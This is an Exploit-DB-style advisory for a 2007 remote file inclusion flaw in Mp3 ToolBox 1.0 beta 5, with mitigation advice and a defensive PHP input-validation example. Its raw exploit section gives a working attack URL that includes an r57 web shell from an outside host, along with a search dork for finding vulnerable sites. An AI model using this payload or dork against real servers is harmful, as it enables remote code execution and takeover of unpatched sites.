Vendor: Mp3 ToolBox
By: Crackers_Child
CVSS: 7.5 (HIGH)
Class: Remote File Include
CWE: 98
Product Name: Mp3 ToolBox
Affected Version From: 1.0 beta 5
Affected Version To: 1.0 beta 5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mp3 ToolBox 1.0 beta 5 Remote File Include Vulnerability

The Mp3 ToolBox 1.0 beta 5 script is vulnerable to remote file inclusion: the skin_file request parameter to index.php reaches include($skin_file). An attacker can exploit this vulnerability by including a malicious file from a remote server, which can lead to unauthorized access or execution of arbitrary code.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Mp3 ToolBox to a patched version that fixes the remote file inclusion vulnerability. Additionally, it is advised to validate and sanitize user-supplied input to prevent any malicious file inclusion.
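
The input validation recommended above, sketched as an added example beside the reported include($skin_file) pattern. This is not Mp3 ToolBox code: the skins/ directory, the skin names and the resolve_skin() helper are assumptions made for illustration.

```php
<?php
// Added example, not Mp3 ToolBox source. SKIN_DIR, DEFAULT_SKIN and
// resolve_skin() are hypothetical names chosen for this sketch.

// Vulnerable pattern reported in the advisory (left commented out):
//   include($skin_file);   // value comes straight from the request

const SKIN_DIR = __DIR__ . '/skins';   // assumed location of skin files
const DEFAULT_SKIN = 'default';        // assumed name of the fallback skin

/**
 * Map a requested skin name to a file inside SKIN_DIR.
 * Anything that is not a known local skin falls back to the default.
 */
function resolve_skin(?string $requested): string
{
    $fallback = SKIN_DIR . '/' . DEFAULT_SKIN . '.php';

    // Accept a bare name only: no scheme, slashes, dots or NUL bytes.
    if ($requested === null
        || !preg_match('/\A[a-z0-9_-]{1,32}\z/i', $requested)) {
        return $fallback;
    }

    // Resolve on disk and confirm the result is still under SKIN_DIR.
    $base = realpath(SKIN_DIR);
    $path = realpath(SKIN_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $fallback;
    }
    return $path;
}

// Read the parameter explicitly rather than through an auto-registered global.
$skin = $_GET['skin_file'] ?? null;
$skin = is_string($skin) ? $skin : null;
include resolve_skin($skin);
```

Keeping allow_url_include set to Off in php.ini (its default since PHP 5.2) adds a second layer by refusing URL wrappers in include.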
Source

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       Mp3 ToolBox 1.0 beta 5
*    [~] Download.....:       http://www.radiotoolbox.com/downloads/mp3toolbox/mp3_toolbox_beta-5.zip
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File Include Vulnerability
*    [~] Dork.........:       intitle:Mp3 ToolBox 1.0
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*     
*
*       [~] Exploit Rfi...:     http://[Target]/[Path]/index.php?skin_file=http://sibersavascilar.com/shelz/r57.txt?
*
*                             
+_______________________________________________________________________________________________________________________+



        [~] Vulnerable......:   include($skin_file);
                      



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-11-23]